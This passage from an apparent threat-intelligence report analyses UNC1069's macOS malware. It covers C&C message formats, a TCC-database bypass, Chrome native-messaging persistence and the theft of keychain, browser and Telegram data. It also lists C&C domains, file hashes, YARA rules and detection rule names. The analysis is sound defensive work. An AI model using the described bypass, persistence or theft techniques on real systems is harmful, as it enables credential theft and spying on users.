<p><span>HYPERCALL accepts a single command-line argument to which it expects a C&amp;C host to connect. This command is then saved to the configuration file located at </span><code>/Library/SystemSettings/.CacheLogs.db</code><span>. HYPERCALL also leverages a hard-coded 16-byte RC4 key to decrypt the data stored within the configuration file, a pattern observed within other UNC1069 malware families. </span></p>
<p><span>The HYPERCALL configuration instructed the downloader to communicate with the following C&amp;C servers on TCP port 443:</span></p>
<ul>
<li role="presentation"><code>wss://supportzm[.]com</code></li>
<li role="presentation"><code>wss://zmsupport[.]com</code></li>
</ul>
<p><span>Once connected, the HYPERCALL registers with the C&amp;C using the following message expecting a response message of 1:</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>{
    "type": "loader",
    "client_id": &lt;client_id&gt;
}</code></pre>
<p><span><span>Figure 6: Registration message sent to the C&amp;C server</span></span></p></div>
<div class="block-paragraph_advanced"><p><span>Once the HYPERCALL has registered with the C&amp;C server, it sends a dynamic library download request:</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>{
    "type": "get_binary",
    "system": "darwin"
}</code></pre>
<p><span><span>Figure 7: Dynamic library download request message sent to the C&amp;C server</span></span></p></div>
<div class="block-paragraph_advanced"><p><span>The C&amp;C server responds to the request with information on the dynamic library to download, followed by the dynamic library content:</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>{
    "type": &lt;unknown&gt;,
    "total_size": &lt;total_size&gt;
}</code></pre>
<p><span><span>Figure 8: Dynamic library download response message received by the C&amp;C server</span></span></p></div>
<div class="block-paragraph_advanced"><p><span>The C&amp;C server informs the HYPERCALL client all of the dynamic library content has been sent via the following message:</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>{
    "type": "end_chunks"
}</code></pre>
<p><span><span>Figure 9: Message sent by the C&amp;C server to mark the end of the dynamic library content</span></span></p></div>
<div class="block-paragraph_advanced"><p><span>After receiving the dynamic library, HYPERCALL sends a final acknowledgement message:</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>{
    "type": "down_ok"
}</code></pre>
<p><span><span>Figure 10: Final acknowledgement message sent by HYPERCALL to the C&amp;C server</span></span></p></div>
<div class="block-paragraph_advanced"><p><span>HYPERCALL then waits for three seconds before executing the downloaded dynamic library in-memory using reflective loading.</span></p>
<h4><span>HIDDENCALL</span></h4>
<p><span>We assess with high confidence that UNC1069 utilizes the HYPERCALL downloader and HIDDENCALL backdoor as components of a single, synchronized attack lifecycle. </span></p>
<p><span>This assessment is supported by forensic observations of HYPERCALL downloading and reflectively injecting HIDDENCALL into system memory. Furthermore, technical examination revealed significant code overlaps between the HYPERCALL Golang binary and HIDDENCALL's Ahead-of-Time (AOT) translation files. Both families utilize identical libraries and follow a distinct "</span><code>t_</code><span>" naming convention for functions (such as </span><code>t_loader</code><span> and </span><code>t_</code><span>), strongly suggesting a unified development environment and shared tradecraft. The use of this custom, integrated tooling suite highlights UNC1069's technical proficiency in developing specialized capabilities to bypass security measures and secure long-term persistence in target networks.</span></p>
<h5><span>Rosetta Cache Analysis</span></h5>
<p><span>Mandiant has previously documented how <a href="https://cloud.google.com/blog/topics/threat-intelligence/rosetta2-artifacts-macos-intrusions">files from the Rosetta cache can be used to prove program execution</a></span><span>, as well as how malware identification can be possible through <a href="https://cloud.google.com/blog/topics/threat-intelligence/north-korea-supply-chain">analysis of the symbols present in the AOT translation files</a>.</span></p>
<p><span>HYPERCALL leveraged the </span><code>NSCreateObjectFileImageFromMemory</code><span> API call to reflectively load a follow-on backdoor component from memory. When </span><code>NSCreateObjectFileImageFromMemory</code><span> is called, the executable file that is to be loaded from memory is temporarily written to disk under the </span><code>/tmp/</code><span> folder, with the filename matching the regular expression pattern </span><code>NSCreateObjectFileImageFromMemory-[A-Za-z0-9]{8}</code><span>. </span></p>
<p><span>This intrinsic behaviour, combined with the HIDDENCALL payload being compiled for x86_64 architecture, resulted in the creation of a Rosetta cache AOT file for the reflectively loaded Mach-O executable. Through analysis of the Rosetta cache file, Mandiant was able to assess with high confidence that the reflectively loaded Mach-O executable was the follow-on backdoor component, also written in Golang, that Mandiant tracks as HIDDENCALL. </span></p>
<p><span>Listed in Figure 11 through Figure 14 are the symbols and project file paths identified from the AOT file associated with HIDDENCALL execution, as well as the HYPERCALL sample analysed by Mandiant, which were used to assess the functionality of HIDDENCALL.</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>_t/common.rc4_encode
_t/common.resolve_server
_t/common.load_config
_t/common.save_config
_t/common.generate_uid
_t/common.send_data
_t/common.send_error_message
_t/common.get_local_ip
_t/common.get_info
_t/common.rsp_get_info
_t/common.override_env
_t/common.exec_command_with_timeout
_t/common.exec_command_with_timeout.func1
_t/common.rsp_exec_cmd
_t/common.send_file
_t/common.send_file.deferwrap1
_t/common.add_file_to_zip
_t/common.add_file_to_zip.deferwrap1
_t/common.zip_file
_t/common.zip_file.func1
_t/common.zip_file.deferwrap2
_t/common.zip_file.deferwrap1
_t/common.rsp_zdn
_t/common.rsp_dn
_t/common.receive_file
_t/common.receive_file.deferwrap1
_t/common.unzipFile
_t/common.unzipFile.deferwrap1
_t/common.rsp_up
_t/common.rsp_inject_explorer
_t/common.rsp_inject
_t/common.wipe_file
_t/common.rsp_wipe_file
_t/common.send_cmd_result
_t/common.rsp_new_shell
_t/common.rsp_exit_shell
_t/common.rsp_enter_shell
_t/common.rsp_leave_shell
_t/common.rsp_run
_t/common.rsp_runx
_t/common.rsp_test_conn
_t/common.rsp_check_event
_t/common.rsp_sleep
_t/common.rsp_pv
_t/common.rsp_pcmd
_t/common.rsp_pkill
_t/common.rsp_dir
_t/common.rsp_state
_t/common.rsp_get_cfg
_t/common.rsp_set_cfg
_t/common.rsp_chdir
_t/common.get_file_property
_t/common.get_file_property.func1
_t/common.rsp_file_property
_t/common.do_work
_t/common.do_work.deferwrap1
_t/common.Start
_t/common.init_env
_t/common.get_config_path
_t/common.get_startup_path
_t/common.get_launch_plist_path
_t/common.get_os_info
_t/common.get_process_uid
_t/common.get_file_info
_t/common.get_dir_entries
_t/common.is_locked
_t/common.check_event
_t/common.change_dir
_t/common.run_command_line
_t/common.run_command_line.func1
_t/common.copy_file
_t/common.copy_file.deferwrap2
_t/common.copy_file.deferwrap1
_t/common.setup_startup
_t/common.file_exist
_t/common.session_work
_t/common.exit_shell
_t/common.restart_shell
_t/common.start_shell_reader
_t/common.watch_shell_output_loop
_t/common.watch_shell_output_loop.func1
_t/common.watch_shell_output_loop.func1.deferwrap1
_t/common.exec_with_shell
_t/common.start_shell_reader.func1
_t/common.do_work.jump513
_t/common.g_shoud_fork
_t/common.CONFIG_CRYPT_KEY
_t/common.g_conn
_t/common.g_shell_cmd
_t/common.g_shell_pty
_t/common.stop_reader_chan
_t/common.stop_watcher_chan
_t/common.g_config_file_path
_t/common.g_output_buffer
_t/common.g_cfg
_t/common.g_use_shell
_t/common.g_working
_t/common.g_out_changed
_t/common.g_reason
_t/common.g_outputMutex</code></pre>
<p><span><span>Figure 11: Notable Golang symbols from the HIDDENCALL AOT file analyzed by Mandiant</span></span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>t_loader/common
t_loader/inject_mac
t_loader/inject_mac._Cfunc_InjectDylibFromMemory
t_loader/inject_mac.Inject
t_loader/inject_mac.Inject.func1
t_loader/common.rc4_encode
t_loader/common.generate_uid
t_loader/common.load_config
t_loader/common.rc4_decode
t_loader/common.save_config
t_loader/common.resolve_server
t_loader/common.receive_file
t_loader/common.Start
t_loader/common.check_server_urls
t_loader/common.inject_pe
t_loader/common.init_env
t_loader/common.get_config_path</code></pre>
<p><span><span>Figure 12: Notable Golang symbols from the HYPERCALL AOT file analyzed by Mandiant</span></span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>/Users/mac/Documents/go_t/t/../build/mac/t.a(000000.o)
/Users/mac/Documents/go_t/t/../build/mac/t.a(000004.o)
/Users/mac/Documents/go_t/t/../build/mac/t.a(000005.o)
/Users/mac/Documents/go_t/t/../build/mac/t.a(000006.o)
/Users/mac/Documents/go_t/t/../build/mac/t.a(000007.o)
/Users/mac/Documents/go_t/t/../build/mac/t.a(000008.o)
/Users/mac/Documents/go_t/t/../build/mac/t.a(000009.o)
/Users/mac/Documents/go_t/t/../build/mac/t.a(000010.o)
/Users/mac/Documents/go_t/t/../build/mac/t.a(000011.o)</code></pre>
<p><span><span>Figure 13: Project file paths from the HIDDENCALL AOT file analyzed by Mandiant</span></span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>/Users/mac/Documents/go_t/t_loader/inject_mac/inject.go
/Users/mac/Documents/go_t/t_loader/common/common.go
/Users/mac/Documents/go_t/t_loader/common/common_unix.go
/Users/mac/Documents/go_t/t_loader/exe.go</code></pre>
<p><span><span>Figure 14: Project file paths from the HYPERCALL AOT file analyzed by Mandiant</span></span></p></div>
<div class="block-paragraph_advanced"><h4><span>DEEPBREATH</span></h4>
<p><span>A new piece of macOS malware identified during the intrusion was DEEPBREATH, a sophisticated data miner designed to bypass a key component of macOS privacy: the Transparency, Consent, and Control (TCC) database. </span></p>
<p><span>Written in Swift, DEEPBREATH's primary purpose is to gain access to files and sensitive personal information.</span></p>
<h5><span>TCC Bypass</span></h5>
<p><span>I</span><span>nstead of prompting the user for elevated permissions, DEEPBREATH directly manipulates the user's TCC database (</span><code>TCC.db</code><span>). It executes a series of steps to circumvent protections that prevent direct modification of the live database:</span></p>
<ol>
<li aria-level="1">
<p role="presentation"><span>Staging: It leverages the Finder application to rename the user's TCC folder and copies the </span><code>TCC.db</code><span> file to a temporary staging location, which allows it to modify the database unchallenged. </span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Permission Injection: Once staged, the malware programmatically inserts permissions, effectively granting itself broad access to critical user folders like Desktop, Documents, and Downloads.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Restoration: Finally, it restores the modified database back to its original location, giving DEEPBREATH the broad file system access it needs to operate.</span></p>
</li>
</ol>
<p><span>It should be noted that this technique is possible due to the Finder application possessing Full Disk Access (FDA) permissions, which are the permissions necessary to modify the user-specific TCC database in macOS. </span></p>
<p><span>To ensure its operation remains uninterrupted, the malware uses an AppleScript to re-launch itself in the background using the </span><code>-autodata</code><span> argument, detaching from the initial process to continue data collection silently throughout the user's session.</span></p>
<p><span>With elevated access, DEEPBREATH systematically targets high-value data:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Credentials: Steals login credentials from the user keychain (</span><code>login.keychain-db</code><span>)</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Browser Data: Copies cookies, login data, and local extension settings from major browsers including Google Chrome, Brave, and Microsoft Edge across all user profiles</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Messaging and Notes: Exfiltrates user data from two different versions of Telegram and also targets and copies database files from Apple Notes</span></p>
</li>
</ul>
<p><span>DEEPBREATH is a prime example of an attack vector focused on bypassing core operating system security features to conduct widespread data theft.</span></p>
<h4><span>SUGARLOADER</span></h4>
<p><span>SUGARLOADER is a downloader written in C++ historically associated with UNC1069 intrusions.</span></p>
<p><span>Based on the observations from this intrusion, SUGARLOADER was solely used to deploy CHROMEPUSH. If SUGARLOADER is run without any command arguments, the binary checks for an existing configuration file located on the victim's computer at </span><code>/Library/OSRecovery/com.apple.os.config</code><span>. </span></p>
<p><span>The configuration is encrypted using RC4, with a hard-coded 32-byte key found in the binary. </span></p>
<p><span>Once decrypted, the configuration data contains up to two URLs that point to the next stage. The URLs are queried to download the next stage of the infection; if the first URL responds with a suitable executable payload, then the second URL is not queried. </span></p>
<p><span>The decrypted SUGARLOADER configuration for the sample analysed by Mandiant included the following C&amp;C servers:</span></p>
<ul>
<li role="presentation"><code>breakdream[.]com:443</code></li>
<li role="presentation"><code>dreamdie[.]com:443</code></li>
</ul>
<h4><span>CHROMEPUSH</span></h4>
<p><span>During this intrusion, a second dataminer was recovered and named CHROMEPUSH. This data miner is written in C++ and installs itself as a browser extension targeting Chromium-based browsers, such as Google Chrome and Brave, to collect keystrokes, username and password inputs, and browser cookies, which it uploads to a web server.</span></p>
<p><span>CHROMEPUSH establishes persistence by installing itself as a native messaging host for Chromium-based browsers. For Google Chrome, CHROMEPUSH copies itself to </span><code>%HOME%/Library/Application Support/Google/Chrome/NativeMessagingHosts/Google Chrome Docs</code><span> and creates a corresponding manifest file, </span><code>com.google.docs.offline.json</code><span>, in the same directory.</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>{
  "name": "com.google.docs.offline",
  "description": "Native messaging for Google Docs Offline extension",
  "path": "%HOME%/Library/Application Support/Google/Chrome/NativeMessagingHosts/Google Chrome Docs",
  "type": "stdio",
  "allowed_origins": [ "chrome-extension://hennhnddfkgohngcngmflkmejacokfik/" ]
}</code></pre>
<p><span><span>Figure 15: Manifest file for Google Chrome native messaging host established by the data miner</span></span></p></div>
<div class="block-paragraph_advanced"><p><span>By installing itself as a native messaging host, CHROMEPUSH will be automatically executed when the corresponding browser is executed. </span></p>
<p><span>Once executed via the native messaging host mechanism, the data miner creates a base data directory at </span><code>%HOME%/Library/Application Support/com.apple.os.receipts</code><span> and performs browser identification. A subdirectory within the base data directory is created with the corresponding identifier, which is based on the detected browser:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Google Chrome leads to the subdirectory being named "</span><code>c".</code></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Brave Browser leads to the subdirectory being named "</span><code>b".</code></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Arc leads to the subdirectory being named "</span><code>a".</code></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Microsoft Edge leads to the subdirectory being named "</span><code>e".</code></p>
</li>
<li aria-level="1">
<p role="presentation"><span>If none of these match, the subdirectory name is set to "</span><code>u".</code></p>
</li>
</ul>
<p><span>CHROMEPUSH reads configuration data from the file location </span><code>%HOME%/Library/Application Support/com.apple.os.receipts/setting.db.</code><span> The configuration settings are parsed in JavaScript Objection Notation (JSON) format. The names of the used JSON variables indicate their potential usage:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><code>cap_on</code><span>: Assumed to control whether screen captures should be taken</span></p>
</li>
<li aria-level="1">
<p role="presentation"><code>cap_time</code><span>: Assumed to control the interval of screen captures</span></p>
</li>
<li aria-level="1">
<p role="presentation"><code>coo_on</code><span>: Assumed to control whether cookies should be accessed</span></p>
</li>
<li aria-level="1">
<p role="presentation"><code>coo_time</code><span>: Assumed to control the interval of accessing the cookie data</span></p>
</li>
<li aria-level="1">
<p role="presentation"><code>key_on</code><span>: Assumed to control whether keypresses should be logged</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>C&amp;C URL</span></p>
</li>
</ul>
<p><span>CHROMEPUSH stages collected data in temporary files within the </span><code>%HOME%/Library/Application Support/com.apple.os.receipts/&lt;browser_id&gt;/</code><span> directory.</span></p>
<p><span>These files are then renamed using the following formats:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Screenshots: </span><code>CAYYMMDDhhmmss.dat</code></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Keylogging: </span><code>KLYYMMDDhhmmss.dat</code></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Cookies: </span><code>CK_&lt;browser_identifier&gt;&lt;unknown_id&gt;.dat</code></p>
</li>
</ul>
<p><span>CHROMEPUSH stages and sends the collected data in HTTP POST requests to its C&amp;C server. In the sample analysed by Mandiant, the C&amp;C server was identified as </span><code>hxxp://cmailer[.]pro:80/upload</code><span>. </span></p>
<h4><span>SILENCELIFT</span></h4>
<p><span>SILENCELIFT is a minimalistic backdoor written in C/C++ that beacons host information to a hard-coded C&amp;C server. The C&amp;C server identified in this sample was identified as </span><code>support-zoom[.]us</code><span>.</span></p>
<p><span>SILENCELIFT retrieves a unique ID from the hard-coded file path /Library/Caches/.Logs.db. Notably, this is the exact same path used by the CHROMEPUSH. The backdoor also gets the lock screen status, which is sent to the C&amp;C server with the unique ID. </span></p>
<p><span>If executed with root privileges, SILENCELIFT can actively interrupt Telegram communications while beaconing to its C&amp;C server.</span></p>
<h3><span>Indicators of Compromise</span></h3>
<p><span>To assist the wider community in hunting and identifying activity outlined in this blog post, we have included indicators of compromise (IOCs) in a <a href="https://www.virustotal.com/gui/collection/d1403f69b1dadfadee1c7d46fd43ac310145339f0a7b49979aead82df8a34f72/summary" rel="noopener" target="_blank">GTI Collection for registered users</a>.</span></p>
<h4><span>Network-Based Indicators</span></h4></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col></colgroup>
<thead>
<tr>
<th scope="col">
<p><span>Indicator</span></p>
</th>
<th scope="col">
<p><span>Description</span></p>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<p><code>mylingocoin.com</code></p>
</td>
<td>
<p><span>Hosted the payload that was retrieved and executed to commence the initial infection</span></p>
</td>
</tr>
<tr>
<td>
<p><code>zoom.uswe05.us</code></p>
</td>
<td>
<p><span>Hosted the fake Zoom meeting</span></p>
</td>
</tr>
<tr>
<td>
<p><code>breakdream.com</code></p>
</td>
<td>
<p><span>SUGARLOADER C&amp;C </span></p>
</td>
</tr>
<tr>
<td>
<p><code>dreamdie.com</code></p>
</td>
<td>
<p><span>SUGARLOADER C&amp;C </span></p>
</td>
</tr>
<tr>
<td>
<p><code>support-zoom.us</code></p>
</td>
<td>
<p><span>SILENCELIFT C&amp;C</span></p>
</td>
</tr>
<tr>
<td>
<p><code>supportzm.com</code></p>
</td>
<td>
<p><span>HYPERCALL C&amp;C</span></p>
</td>
</tr>
<tr>
<td>
<p><code>zmsupport.com</code></p>
</td>
<td>
<p><span>HYPERCALL C&amp;C</span></p>
</td>
</tr>
<tr>
<td>
<p><code>cmailer.pro</code></p>
</td>
<td>
<p><span>CHROMEPUSH upload server </span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><h4>Host-Based Indicators</h4></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong><span>Description</span></strong></p>
</td>
<td>
<p><strong><span>SHA-256 Hash</span></strong></p>
</td>
<td>
<p><strong><span>File Name</span></strong></p>
</td>
</tr>
<tr>
<td>
<p><span>DEEPBREATH</span></p>
</td>
<td>
<p><code>b452C2da7c012eda25a1403b3313444b5eb7C2c3e25eee489f1bd256f8434735</code></p>
</td>
<td>
<p><code>/Library/Caches/System Settings</code></p>
</td>
</tr>
<tr>
<td>
<p><span>SUGARLOADER</span></p>
</td>
<td>
<p><code>1a30d6cdb0b98feed62563be8050db55ae0156ed437701d36a7b46aabf086ede</code></p>
</td>
<td>
<p><code>/Library/OSRecovery/SystemUpdater</code></p>
</td>
</tr>
<tr>
<td>
<p><span>WAVESHAPER</span></p>
</td>
<td>
<p><code>b525837273dde06b86b5f93f9aeC2C29665324105b0b66f6df81884754f8080d</code></p>
</td>
<td>
<p><code>/Library/Caches/com.apple.mond</code></p>
</td>
</tr>
<tr>
<td>
<p><span>HYPERCALL</span></p>
</td>
<td>
<p><code>c8f7608d4e19f6cb03680941bbd09fe969668bcb09c7ca985048a22e014dffcd</code></p>
</td>
<td>
<p><code>/Library/SystemSettings/com.apple.system.settings</code></p>
</td>
</tr>
<tr>
<td>
<p><span>CHROMEPUSH</span></p>
</td>
<td>
<p><code>603848f37ab932dccef98ee27e3c5af9221d3b6ccfe457ccf93cb572495ac325</code></p>
</td>
<td>
<p><code>/Users/&lt;user&gt;/Library/Application Support/Google/Chrome/NativeMessagingHosts/Brave Browser Docs</code></p>
<p><code>/Users/&lt;user&gt;/Library/Application Support/Google/Chrome/NativeMessagingHosts/Google Chrome Docs</code></p>
<p><code>/Library/Caches/chromeext</code></p>
</td>
</tr>
<tr>
<td>
<p><span>SILENCELIFT</span></p>
</td>
<td>
<p><code>c3e5d878a30a6c46e22d1dd2089b32086c91f13f8b9c413aa84e1dbaa03b9375</code></p>
</td>
<td>
<p><code>/Library/Fonts/com.apple.logd</code></p>
</td>
</tr>
<tr>
<td>
<p><span>HYPERCALL configuration (executes itself with sudo)</span></p>
</td>
<td>
<p><code>03f00a143b8929585c122d490b6a3895d639c17d92C2223917e3a9ca1b8d30f9</code></p>
</td>
<td>
<p><code>/Library/SystemSettings/.CacheLogs.db</code></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><h4>YARA Rules</h4></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Backdoor_WAVESHAPER_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
		date_created = "2025-11-03"
		date_modified = "2025-11-03"
		md5 = "c91725905b273e81e9cc6983a11c8d60"
		rev = 1
	strings:
		$str1 = "mozilla/4.0 (compatible; msie 8.0; windows nt 5.1; trident/4.0)"
		$str2 = "/tmp/.%s"
		$str3 = "grep \"Install Succeeded\" /var/log/install.log | awk '{print $1, $2}'"
		$str4 = "sysctl -n hw.model"
		$str5 = "sysctl -n machdep.cpu.brand_string"
		$str6 = "sw_vers --ProductVersion"
	condition:
		all of them
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Backdoor_WAVESHAPER_2 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
		date_created = "2025-11-03"
		date_modified = "2025-11-03"
		md5 = "eb7635f4836c9e0aa4c315b18b051cb5"
		rev = 1
	strings:
		$str1 = "__Z10RunCommand"
		$str2 = "__Z11GenerateUID"
		$str3 = "__Z11GetResponse"
		$str4 = "__Z13WriteCallback"
		$str5 = "__Z14ProcessRequest"
		$str6 = "__Z14SaveAndExecute"
		$str7 = "__Z16MakeStatusString"
		$str8 = "__Z24GetCurrentExecutablePath"
		$str9 = "__Z7Execute"
	condition:
		all of them
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Downloader_HYPERCALL_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
		date_created = "2025-10-24"
		date_modified = "2025-10-24"
		rev = 1
	strings:
		$go_build = "Go build ID:"
		$go_inf = "Go buildinf:"
		$lib1 = "/inject_mac/inject.go"
		$lib2 = "github.com/gorilla/websocket"
		$func1 = "t_loader/inject_mac.Inject"
		$func2 = "t_loader/common.rc4_decode"
		$c1 = { 48 BF 00 AC 23 FC 06 00 00 00 0F 1F 00 E8 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 8B 32 48 8B 52 ?? 48 8B 76 ?? 48 89 CF 48 89 D9 48 89 C3 48 89 D0 FF D6 }
		$c2 = { 48 89 D6 48 F7 EA 48 01 DA 48 01 CA 48 C1 FA 1A 48 C1 FE 3F 48 29 F2 48 69 D2 00 E1 F5 05 48 29 D3 48 8D 04 19 }
	condition:
		(uint32(0) == 0xfeedface or uint32(0) == 0xcafebabe or uint32(0) == 0xbebafeca or uint32(0) == 0xcefaedfe or uint32(0) == 0xfeedfacf or uint32(0) == 0xcffaedfe) and all of ($go*) and any of ($lib*) and any of ($func*) and all of ($c*)
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Backdoor_SILENCELIFT_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
		md5 = "4e4f2dfe143ba261fd8a18d1c4b58f2e"
		date_created = "2025/10/23"
		date_modified = "2025/10/28"
		rev = 2
	strings:
		$ss1 = "/usr/libexec/PlistBuddy -c \"print :IOConsoleUsers:0:CGSSessionScreenIsLocked\" /dev/stdin 2&gt;/dev/null &lt;&lt;&lt; \"$(ioreg -n Root -d1 -a)\"" ascii fullword
		$ss2 = "pkill -CONT -f" ascii fullword
		$ss3 = "pkill -STOP -f" ascii fullword
		$ss4 = "/Library/Caches/.Logs.db" ascii fullword
		$ss5 = "/Library/Caches/.evt_"
		$ss6 = "{\"bot_id\":\""
		$ss7 = "\", \"status\":"
		$ss8 = "/Library/Fonts/.analyzed" ascii fullword
	condition:
		all of them
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_APTFIN_Downloader_SUGARLOADER_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
		md5 = "3712793d3847dd0962361aa528fa124c"
		date_created = "2025/10/15"
		date_modified = "2025/10/15"
		rev = 1
	strings:
		$ss1 = "/Library/OSRecovery/com.apple.os.config"
		$ss2 = "/Library/Group Containers/OSRecovery"
		$ss4 = "_wolfssl_make_rng"
	condition:
		all of them
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_APTFIN_Downloader_SUGARLOADER_2 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$m1 = "__mod_init_func\x00lko2\x00"
		$m2 = "__mod_term_func\x00lko2\x00"
		$m3 = "/usr/lib/libcurl.4.dylib"
	condition:
		(uint32(0) == 0xfeedface or uint32(0) == 0xfeedfacf or uint32(0) == 0xcefaedfe or uint32(0) == 0xcffaedfe or uint32(0) == 0xcafebabe) and (all of ($m1, $m2, $m3))
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Datamine_DEEPBREATH_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$sa1 = "-fakedel"
		$sa2 = "-autodat"
		$sa3 = "-datadel"
		$sa4 = "-extdata"
		$sa5 = "TccClickJack"
		$sb1 = "com.apple.TCC\" as alias"
		$sb2 = "/TCC.db\" as alias"
		$sc1 = "/group.com.apple.notes\") as alias"
		$sc2 = ".keepcoder.Telegram\")"
		$sc3 = "Support/Google/Chrome/\")"
		$sc4 = "Support/BraveSoftware/Brave-Browser/\")"
		$sc5 = "Support/Microsoft Edge/\")"
		$sc6 = "&amp; \"/Local Extension Settings\""
		$sc7 = "&amp; \"/Cookies\""
		$sc8 = "&amp; \"/Login Data\""
		$sd1 = "\"cp -rf \" &amp; quoted form of "
	condition:
		(uint32(0) == 0xfeedfacf) and 2 of ($sa*) and 2 of ($sb*) and 3 of ($sc*) and 1 of ($sd*)
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Datamine_CHROMEPUSH_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
		date_created = "2025-11-06"
		date_modified = "2025-11-06"
		rev = 1
	strings:
		$s1 = "%s/CA%02d%02d%02d%02d%02d%02d.dat"
		$s2 = "%s/tmpCA.dat"
		$s3 = "mouseStates"
		$s4 = "touch /Library/Caches/.evt_"
		$s5 = "cp -f"
		$s6 = "rm -rf"
		$s7 = "keylogs"
		$s8 = "%s/KL%02d%02d%02d%02d%02d%02d.dat"
		$s9 = "%s/tmpKL.dat"
		$s10 = "OK: Create data.js success"
	condition:
		(uint32(0) == 0xfeedface or uint32(0) == 0xcefaedfe or uint32(0) == 0xfeedfacf or uint32(0) == 0xcffaedfe or uint32(0) == 0xcafebabe or uint32(0) == 0xbebafeca or uint32(0) == 0xcafebabf or uint32(0) == 0xbfbafeca) and 8 of them
}</code></pre></div>
<div class="block-paragraph_advanced"><h3><span>Google Security Operations (SecOps)</span></h3>
<p><span>Google SecOps customers have access to these broad category rules and more under the “Mandiant Intel Emerging Threats” and “Mandiant Hunting Rules” rule packs. The activity discussed in the blog post is detected in Google SecOps under the rule names:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Application Support com.apple Suspicious Filewrites</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Chrome Native Messaging Directory</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Chrome Service Worker Directory Deletion</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Database Staging in Library Caches</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>macOS Chrome Extension Modification</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>macOS Notes Database Harvesting</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>macOS TCC Database Manipulation</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Suspicious Access To macOS Web Browser Credentials</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Suspicious Audio Hardware Fingerprinting</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Suspicious Keychain Interaction</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Suspicious Library Font Directory File Write</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Suspicious Multi-Stage Payload Loader</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Suspicious Permissions on macOS System File</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Suspicious SoftwareUpdate Masquerading</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Suspicious TCC Database Modification</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Suspicious Web Downloader Pipe to ZSH</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Telegram Session Data Staging</span></p>
</li>
</ul></div>]]></content:encoded>
</item>
<item>
